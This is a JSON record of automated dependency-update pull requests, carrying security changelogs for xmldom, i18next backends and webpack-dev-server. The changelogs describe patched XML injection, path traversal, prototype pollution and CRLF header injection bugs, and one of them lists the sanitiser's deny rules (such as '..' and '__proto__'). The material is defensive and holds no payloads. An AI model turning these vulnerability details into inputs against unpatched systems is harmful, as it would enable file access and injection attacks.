Previously, deeply nested DOM trees would exhaust the JavaScript call stack and throw an unrecoverable \u003ccode\u003eRangeError\u003c/code\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-2v35-w6hq-6mfw\"\u003e\u003ccode\u003eGHSA-2v35-w6hq-6mfw\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/Jvr2022\"\u003e\u003ccode\u003e@​Jvr2022\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/praveen-kv\"\u003e\u003ccode\u003e@​praveen-kv\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/decsecre583\"\u003e\u003ccode\u003e@​decsecre583\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/tlsbollei\"\u003e\u003ccode\u003e@​tlsbollei\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/KarimTantawey\"\u003e\u003ccode\u003e@​KarimTantawey\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003ch2\u003e0.8.12\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.11...0.8.12\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epreserve trailing whitespace in ProcessingInstruction data \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/962\"\u003e\u003ccode\u003e[#962](https://github.com/xmldom/xmldom/issues/962)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/42\"\u003e\u003ccode\u003e[#42](https://github.com/xmldom/xmldom/issues/42)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003ecreateCDATASection\u003c/code\u003e now throws \u003ccode\u003eInvalidCharacterError\u003c/code\u003e when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e, as required by the \u003ca href=\"https://dom.spec.whatwg.org/#dom-document-createcdatasection\"\u003eWHATWG DOM spec\u003c/a\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer\u003c/code\u003e now splits CDATASection nodes whose data contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e into adjacent CDATA sections at serialization time, preventing XML injection via mutation methods (\u003ccode\u003eappendData\u003c/code\u003e, \u003ccode\u003ereplaceData\u003c/code\u003e, \u003ccode\u003e.data =\u003c/code\u003e, \u003ccode\u003e.textContent =\u003c/code\u003e). \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eCode that passes a string containing \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e to \u003ccode\u003ecreateCDATASection\u003c/code\u003e and relied on the previously unsafe behavior will now receive \u003ccode\u003eInvalidCharacterError\u003c/code\u003e. Use a mutation method such as \u003ccode\u003eappendData\u003c/code\u003e if you intentionally need \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e in a CDATASection node's data.\u003c/p\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/stevenobiajulu\"\u003e\u003ccode\u003e@​stevenobiajulu\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/discussions/357\"\u003ehttps://github.com/xmldom/xmldom/discussions/357\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e0.8.11\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.10...0.8.11\"\u003e0.8.11\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate \u003ccode\u003eownerDocument\u003c/code\u003e when moving nodes between documents \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/933\"\u003e\u003ccode\u003e[#933](https://github.com/xmldom/xmldom/issues/933)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/932\"\u003e\u003ccode\u003e[#932](https://github.com/xmldom/xmldom/issues/932)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you, \u003ca href=\"https://github.com/shunkica\"\u003e\u003ccode\u003e@​shunkica\u003c/code\u003e\u003c/a\u003e, for your contributions\u003c/p\u003e\n\u003ch2\u003e0.8.10\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.9...0.8.10\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/xmldom/xmldom/blob/master/CHANGELOG.md\"\u003e@​xmldom/xmldom's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.12...0.8.13\"\u003e0.8.13\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer.serializeToString()\u003c/code\u003e (and \u003ccode\u003eNode.toString()\u003c/code\u003e, \u003ccode\u003eNodeList.toString()\u003c/code\u003e) now accept a \u003ccode\u003erequireWellFormed\u003c/code\u003e option (fourth argument, after \u003ccode\u003eisHtml\u003c/code\u003e and \u003ccode\u003enodeFilter\u003c/code\u003e). When \u003ccode\u003e{ requireWellFormed: true }\u003c/code\u003e is passed, the serializer throws \u003ccode\u003eInvalidStateError\u003c/code\u003e for injection-prone node content, preventing XML injection via attacker-controlled node data. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-j759-j44w-7fr8\"\u003e\u003ccode\u003eGHSA-j759-j44w-7fr8\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-x6wf-f3px-wcqx\"\u003e\u003ccode\u003eGHSA-x6wf-f3px-wcqx\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h\"\u003e\u003ccode\u003eGHSA-f6ww-3ggp-fr8h\u003c/code\u003e\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eComment: throws when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e--\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eProcessingInstruction: throws when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e?\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDocumentType: throws when \u003ccode\u003epublicId\u003c/code\u003e fails \u003ccode\u003ePubidLiteral\u003c/code\u003e, \u003ccode\u003esystemId\u003c/code\u003e fails \u003ccode\u003eSystemLiteral\u003c/code\u003e, or \u003ccode\u003einternalSubset\u003c/code\u003e contains \u003ccode\u003e]\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eSecurity: DOM traversal operations (\u003ccode\u003eXMLSerializer.serializeToString()\u003c/code\u003e, \u003ccode\u003eNode.prototype.normalize()\u003c/code\u003e, \u003ccode\u003eNode.prototype.cloneNode(true)\u003c/code\u003e, \u003ccode\u003eDocument.prototype.importNode(node, true)\u003c/code\u003e, \u003ccode\u003enode.textContent\u003c/code\u003e getter, \u003ccode\u003egetElementsByTagName()\u003c/code\u003e / \u003ccode\u003egetElementsByTagNameNS()\u003c/code\u003e / \u003ccode\u003egetElementsByClassName()\u003c/code\u003e / \u003ccode\u003egetElementById()\u003c/code\u003e) are now iterative. Previously, deeply nested DOM trees would exhaust the JavaScript call stack and throw an unrecoverable \u003ccode\u003eRangeError\u003c/code\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-2v35-w6hq-6mfw\"\u003e\u003ccode\u003eGHSA-2v35-w6hq-6mfw\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/Jvr2022\"\u003e\u003ccode\u003e@​Jvr2022\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/praveen-kv\"\u003e\u003ccode\u003e@​praveen-kv\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/decsecre583\"\u003e\u003ccode\u003e@​decsecre583\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/tlsbollei\"\u003e\u003ccode\u003e@​tlsbollei\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/KarimTantawey\"\u003e\u003ccode\u003e@​KarimTantawey\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.9.8...0.9.9\"\u003e0.9.9\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eimplement \u003ccode\u003eParentNode.children\u003c/code\u003e getter \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/960\"\u003e\u003ccode\u003e[#960](https://github.com/xmldom/xmldom/issues/960)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/410\"\u003e\u003ccode\u003e[#410](https://github.com/xmldom/xmldom/issues/410)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity: \u003ccode\u003ecreateCDATASection\u003c/code\u003e now throws \u003ccode\u003eInvalidCharacterError\u003c/code\u003e when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e, as required by the \u003ca href=\"https://dom.spec.whatwg.org/#dom-document-createcdatasection\"\u003eWHATWG DOM spec\u003c/a\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer\u003c/code\u003e now splits CDATASection nodes whose data contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e into adjacent CDATA sections at serialization time, preventing XML injection via mutation methods (\u003ccode\u003eappendData\u003c/code\u003e, \u003ccode\u003ereplaceData\u003c/code\u003e, \u003ccode\u003e.data =\u003c/code\u003e, \u003ccode\u003e.textContent =\u003c/code\u003e). \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ecorrectly traverse ancestor chain in \u003ccode\u003eNode.contains\u003c/code\u003e \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/931\"\u003e\u003ccode\u003e[#931](https://github.com/xmldom/xmldom/issues/931)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eCode that passes a string containing \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e to \u003ccode\u003ecreateCDATASection\u003c/code\u003e and relied on the previously unsafe behavior will now receive \u003ccode\u003eInvalidCharacterError\u003c/code\u003e. Use a mutation method such as \u003ccode\u003eappendData\u003c/code\u003e if you intentionally need \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e in a CDATASection node's data.\u003c/p\u003e\n\u003ch3\u003eChore\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdated dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/stevenobiajulu\"\u003e\u003ccode\u003e@​stevenobiajulu\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/yoshi389111\"\u003e\u003ccode\u003e@​yoshi389111\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.11...0.8.12\"\u003e0.8.12\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epreserve trailing whitespace in ProcessingInstruction data \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/962\"\u003e\u003ccode\u003e[#962](https://github.com/xmldom/xmldom/issues/962)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/42\"\u003e\u003ccode\u003e[#42](https://github.com/xmldom/xmldom/issues/42)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/e5c14802592685bb872c042c54c3f73758875c85\"\u003e\u003ccode\u003ee5c1480\u003c/code\u003e\u003c/a\u003e 0.8.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/9611e20d75f059dc377f806a8f7ee7d1eaeaeb7c\"\u003e\u003ccode\u003e9611e20\u003c/code\u003e\u003c/a\u003e style: drop unused import in test file\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/dc4dff3d1d0b5a6b97c52fcc1823a735b8821e62\"\u003e\u003ccode\u003edc4dff3\u003c/code\u003e\u003c/a\u003e docs: add 0.8.13 changelog entry\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/842fa38deedd2d9a9c90d0ad54aa1be75d2a41bc\"\u003e\u003ccode\u003e842fa38\u003c/code\u003e\u003c/a\u003e fix: prevent stack overflow in normalize (GHSA-2v35-w6hq-6mfw)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/aeff69f5a32e8c1bd540683da9e10718f84f595c\"\u003e\u003ccode\u003eaeff69f\u003c/code\u003e\u003c/a\u003e test: add normalize behavioral coverage to node.test.js\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/cbdb0d7db8ae70760bd4cc181cb8f30bb0cd9d88\"\u003e\u003ccode\u003ecbdb0d7\u003c/code\u003e\u003c/a\u003e fix: make walkDOM iterative to prevent stack overflow (GHSA-2v35-w6hq-6mfw)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/0b543d31794dc198c86a0358574cb5dec29674c5\"\u003e\u003ccode\u003e0b543d3\u003c/code\u003e\u003c/a\u003e test: assert namespace declarations are isolated between siblings in serializ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/c007c51909587990c962cf3d5c2acadf4c897b87\"\u003e\u003ccode\u003ec007c51\u003c/code\u003e\u003c/a\u003e refactor: migrate serializeToString to walkDOM\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/2bb3899074820089d9e76ce28a5edfdacf425025\"\u003e\u003ccode\u003e2bb3899\u003c/code\u003e\u003c/a\u003e test: add serializeToString coverage for uncovered branches\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/e69f38d0a58731152d300e8c8eb29506f5f488fe\"\u003e\u003ccode\u003ee69f38d\u003c/code\u003e\u003c/a\u003e refactor: migrate importNode to walkDOM\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/xmldom/xmldom/compare/0.7.13...0.8.13\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~karfau\"\u003ekarfau\u003c/a\u003e, a new releaser for \u003ccode\u003e@​xmldom/xmldom\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `i18next-fs-backend` from 2.3.1 to 2.6.4\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/i18next/i18next-fs-backend/blob/master/CHANGELOG.md\"\u003ei18next-fs-backend's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e2.6.4\u003c/h3\u003e\n\u003cp\u003eSecurity release — all issues found via an internal audit. See published advisory \u003ca href=\"https://github.com/i18next/i18next-fs-backend/security/advisories/GHSA-8847-338w-5hcj\"\u003eGHSA-8847-338w-5hcj\u003c/a\u003e.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esecurity: refuse to build filesystem paths when \u003ccode\u003elng\u003c/code\u003e or \u003ccode\u003ens\u003c/code\u003e values contain \u003ccode\u003e..\u003c/code\u003e, path separators (\u003ccode\u003e/\u003c/code\u003e, \u003ccode\u003e\\\u003c/code\u003e), control characters, prototype keys (\u003ccode\u003e__proto__\u003c/code\u003e / \u003ccode\u003econstructor\u003c/code\u003e / \u003ccode\u003eprototype\u003c/code\u003e), or exceed 128 chars. Prevents arbitrary filesystem read / write via attacker-controlled language-code values. Any legitimate i18next language-code shape (BCP-47-like, underscores, hyphens, dots, \u003ccode\u003e+\u003c/code\u003e-joined multi-language requests) is still accepted (\u003ca href=\"https://github.com/i18next/i18next-fs-backend/security/advisories/GHSA-8847-338w-5hcj\"\u003eGHSA-8847-338w-5hcj\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edocs: new \u0026quot;Security considerations\u0026quot; README section — documents the filesystem-path sanitiser and clarifies the trust model around \u003ccode\u003e.js\u003c/code\u003e/\u003ccode\u003e.ts\u003c/code\u003e locale files (their content is \u003ccode\u003eeval\u003c/code\u003e-ed, so they must be treated as code). The \u003ccode\u003eeval\u003c/code\u003e behaviour itself is retained: dynamic expressions in \u003ccode\u003e.js\u003c/code\u003e/\u003ccode\u003e.ts\u003c/code\u003e locale files are an intentional feature, and safe replacements like \u003ccode\u003eimport()\u003c/code\u003e are async-only and not viable for this sync-capable code path.\u003c/li\u003e\n\u003cli\u003echore: ignore \u003ccode\u003e.env*\u003c/code\u003e and \u003ccode\u003e*.pem\u003c/code\u003e/\u003ccode\u003e*.key\u003c/code\u003e files in \u003ccode\u003e.gitignore\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e2.6.3\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse own interpolation function instead of relying on i18next's interpolator\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e2.6.1\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump js-yaml from 4.1.0 to 4.1.1 (\u003ca href=\"https://redirect.github.com/i18next/i18next-fs-backend/issues/64\"\u003e#64\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e2.6.0\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003esupport \u003ccode\u003einitImmediate\u003c/code\u003e -\u0026gt; \u003ccode\u003einitAsync\u003c/code\u003e renaming of i18next v24\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e2.5.0\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix for Deno 2 and removal of unnecessary .cjs file\u003c/li\u003e\n\u003cli\u003efor esm build environments not supporting top-level await, you should import the \u003ccode\u003ei18next-fs-backend/cjs\u003c/code\u003e export or stay at v2.4.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/7f623074a6d6239120c6349eacbd68de7e3c0b2f\"\u003e\u003ccode\u003e7f62307\u003c/code\u003e\u003c/a\u003e 2.6.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/adf8a307f660973761e4b4e9293ae646505ea3fa\"\u003e\u003ccode\u003eadf8a30\u003c/code\u003e\u003c/a\u003e security: hardening for 2.6.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/3bd0132fb314fd2fe569d24a9716fb6446a4db6c\"\u003e\u003ccode\u003e3bd0132\u003c/code\u003e\u003c/a\u003e update deps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/fd1616f8617cdee78cc82db698c8efe548f41b9e\"\u003e\u003ccode\u003efd1616f\u003c/code\u003e\u003c/a\u003e Bump fastify from 5.3.2 to 5.8.5 in /example/fastify (\u003ca href=\"https://redirect.github.com/i18next/i18next-fs-backend/issues/67\"\u003e#67\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/8b6a5ba4c53659fab07b0829296bfa8afeaf9d89\"\u003e\u003ccode\u003e8b6a5ba\u003c/code\u003e\u003c/a\u003e 2.6.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/957635d9aba1f59db6b6dcd79aa54be67432672e\"\u003e\u003ccode\u003e957635d\u003c/code\u003e\u003c/a\u003e use own interpolation function\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/2771083a9d739c8d1456c3cbf6b76fc16ec025d2\"\u003e\u003ccode\u003e2771083\u003c/code\u003e\u003c/a\u003e 2.6.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/2cd2c20f113b531cc5908c9b5041781e8cd89403\"\u003e\u003ccode\u003e2cd2c20\u003c/code\u003e\u003c/a\u003e use own interpolation function\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/b1e42e4f7bbb76becff65c0cfd744e594ac2e72f\"\u003e\u003ccode\u003eb1e42e4\u003c/code\u003e\u003c/a\u003e 2.6.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/87d032b02ac9c8a34b2fcb9faa93d3cb1cdb291f\"\u003e\u003ccode\u003e87d032b\u003c/code\u003e\u003c/a\u003e build\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/i18next/i18next-fs-backend/compare/v2.3.1...v2.6.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `i18next-http-middleware` from 3.5.0 to 3.9.3\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/i18next/i18next-http-middleware/blob/master/CHANGELOG.md\"\u003ei18next-http-middleware's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/i18next/i18next-http-middleware/compare/v3.9.2...v3.9.3\"\u003ev3.9.3\u003c/a\u003e\u003c/h2\u003e\n\u003cp\u003eSecurity release — all issues found via an internal audit. See published GHSA advisories \u003ca href=\"https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-5fgg-jcpf-8jjw\"\u003eGHSA-5fgg-jcpf-8jjw\u003c/a\u003e and \u003ca href=\"https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-c3h8-g69v-pjrg\"\u003eGHSA-c3h8-g69v-pjrg\u003c/a\u003e.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esecurity: guard \u003ccode\u003eutils.setPath\u003c/code\u003e against prototype pollution via crafted \u003ccode\u003elng\u003c/code\u003e/\u003ccode\u003ens\u003c/code\u003e in \u003ccode\u003egetResourcesHandler\u003c/code\u003e (\u003ca href=\"https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-5fgg-jcpf-8jjw\"\u003eGHSA-5fgg-jcpf-8jjw\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003esecurity: sanitise \u003ccode\u003eContent-Language\u003c/code\u003e response header to prevent CRLF injection / unhandled \u003ccode\u003eERR_INVALID_CHAR\u003c/code\u003e crash via unsanitised language codes (\u003ca href=\"https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-c3h8-g69v-pjrg\"\u003eGHSA-c3h8-g69v-pjrg\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003esecurity: skip inherited/prototype-polluting keys (\u003ccode\u003e__proto__\u003c/code\u003e, \u003ccode\u003econstructor\u003c/code\u003e, \u003ccode\u003eprototype\u003c/code\u003e) in \u003ccode\u003emissingKeyHandler\u003c/code\u003e request body (\u003ca href=\"https://github.com/i18next/i...\n\n_Description has been truncated_","html_url":"https://github.com/imagelessthought/overleaf/pull/32","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/imagelessthought%2Foverleaf/issues/32","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/32/packages"}},{"old_version":"5.2.1","new_version":"5.2.4","update_type":"patch","path":null,"pr_created_at":"2026-05-26T23:11:40.000Z","version_change":"5.2.1 → 5.2.4","issue":{"uuid":"4528132367","node_id":"PR_kwDOCiLU2M7fm4v2","number":81,"state":"open","title":"Bump webpack-dev-server from 5.2.1 to 5.2.4","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-26T23:11:40.000Z","updated_at":"2026-05-27T00:10:26.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"webpack-dev-server","old_version":"5.2.1","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"}],"path":null,"ecosystem":"npm"},"body":"Bumps [webpack-dev-server](https://github.com/webpack/webpack-dev-server) from 5.2.1 to 5.2.4.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca 